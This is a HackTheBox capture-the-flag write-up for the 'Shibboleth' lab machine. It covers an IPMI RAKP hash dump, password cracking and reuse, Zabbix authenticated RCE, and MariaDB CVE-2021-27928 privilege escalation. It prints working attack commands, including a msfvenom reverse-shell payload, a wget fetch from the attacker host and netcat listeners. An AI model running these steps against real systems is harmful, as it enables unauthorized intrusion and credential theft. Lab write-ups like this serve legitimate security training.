xsspresso
xsspresso
WriteupsHTB — Shibboleth
MiscMediumLinux

HTB — Shibboleth

IPMI 2.0 cipher 0 authentication bypass via RAKP attack dumps password hash. MariaDB CVE-2021-27928 RCE and Zabbix for lateral movement.

January 26, 2025HackTheBox
#IPMI#RAKP#MariaDB#CVE-2021-27928

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.124
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 11:35 EST
Nmap scan report for 10.10.11.124
Host is up (0.026s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.10 - 5.15
Network Distance: 2 hops
Service Info: Host: shibboleth.htb
 
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   23.91 ms 10.10.14.1
2   24.04 ms 10.10.11.124

udp scan

sh
sudo nmap -sU -sV -sC -p U:161,162,53,22,110,143,623,993,995 10.10.11.124
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 12:35 EST
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.019s latency).
 
PORT    STATE  SERVICE  VERSION
22/udp  closed ssh
53/udp  closed domain
110/udp closed pop3
143/udp closed imap
161/udp closed snmp
162/udp closed snmptrap
623/udp open   asf-rmcp
993/udp closed imaps
995/udp closed pop3s
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.95%I=7%D=1/26%Time=67967264%P=x86_64-pc-linux-gnu%r(ipm
SF:i-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\x01
SF:\x97\x04\x03\0\0\0\0\t");

vhost ffuf

sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://shibboleth.htb/ -H 'Host: FUZZ.shibboleth.htb' -fw 18
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://shibboleth.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.shibboleth.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 18
________________________________________________
 
monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 31ms]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 34ms]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 35ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1652 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

623/udp

sh
623/udp open   asf-rmcp

dumping IPMI hashes

sh
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124
rhosts => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
 
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:b7abc698820100005aa281965e477f6c112a2fbd029ec4a2c75803129b082f63e91f6bccfadae6d4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:32c86a630ca7e14ce0d72cf801efe327f9ee6285
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hashcat

sh
hashcat -m 7300 oracle_nts_hash.txt /usr/share/wordlists/rockyou.txt 
 
b7abc698820100005aa281965e477f6c112a2fbd029ec4a2c75803129b082f63e91f6bccfadae6d4a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:32c86a630ca7e14ce0d72cf801efe327f9ee6285:ilovepumkinpie1

creds

Administrator:ilovepumkinpie1

  • creds working for http://zabbix.shibboleth.htb

Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)

  • wait a minute or so to receive a shell
sh
python3 50816.py http://zabbix.shibboleth.htb Administrator ilovepumkinpie1 10.10.14.13 1234

shell as zabbix

sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.124] 35748
sh: 0: can't access tty; job control turned off
$ whoami
zabbix

password reuse for ipmi-svc

sh
zabbix@shibboleth:/home$ su ipmi-svc
su ipmi-svc
Password: ilovepumkinpie1
whoami
ipmi-svc

user.txt

sh
ipmi-svc@shibboleth:~$ cat user.txt
cat user.txt
107e25a4...

priv esc

sh
ipmi-svc@shibboleth:/home$ uname -a
uname -a
Linux shibboleth 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
sh
╔══════════╣ Sudo version
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
sh
╔══════════╣ Active Ports
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:10050           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:10051           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::10050                :::*                    LISTEN      -                   
tcp6       0      0 :::10051                :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -

CVE-2021-27928 (10.3.25-MariaDB)

  • https://github.com/Al1ex/CVE-2021-27928
sh
╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
MySQL user: root
sh
╔══════════╣ Analyzing Zabbix Files (limit 70)
-rw-r----- 1 root ipmi-svc 21863 Apr 24  2021 /etc/zabbix/zabbix_server.conf
LogFile=/var/log/zabbix/zabbix_server.log
LogFileSize=0
PidFile=/run/zabbix/zabbix_server.pid
SocketDir=/run/zabbix
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
SNMPTrapperFile=/var/log/snmptrap/snmptrap.log
Timeout=4
AlertScriptsPath=/usr/lib/zabbix/alertscripts
ExternalScripts=/usr/lib/zabbix/externalscripts
FpingLocation=/usr/bin/fping
Fping6Location=/usr/bin/fping6
LogSlowQueries=3000
StatsAllowedIP=127.0.0.1

mysql creds

zabbix:bloooarskybluh

sh
ipmi-svc@shibboleth:/etc/zabbix$ mysql -u 'zabbix' -p''
sh
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| zabbix             |
+--------------------+
2 rows in set (0.000 sec)
sh
MariaDB [(none)]> use zabbix;
sh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=1235 -f elf-so -o CVE-2021-27928.so
sh
ipmi-svc@shibboleth:~$ wget http://10.10.14.13/CVE-2021-27928.so
sh
MariaDB [(none)]> SET GLOBAL wsrep_provider="/home/ipmi-svc/CVE-2021-27928.so";
sh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.124] 52638
whoami
root

root.txt

sh
cat root.txt
9dcdaaf4...

Up next

MediumJan 2025

HTB — BigBang

WordPress BuddyForms plugin SSRF for local file read. Grafana SQLite injection for credentials. Telescope log viewer arbitrary file read for root key.

Read writeup
MediumJan 2025

HTB — StreamIO

SQLi on login page, LFI reveals PHP source. MSSQL xp_cmdshell for shell. Firefox DPAPI credential decryption leads to Domain Admin via ADCS.

Read writeup
MediumFeb 2025

HTB — Cat

Apache mod_rewrite CVE-2024-38472 XSS in redirect. Stored XSS steals admin cookie for Gitea access. SQLite injection and Gitea hook RCE for root.

Read writeup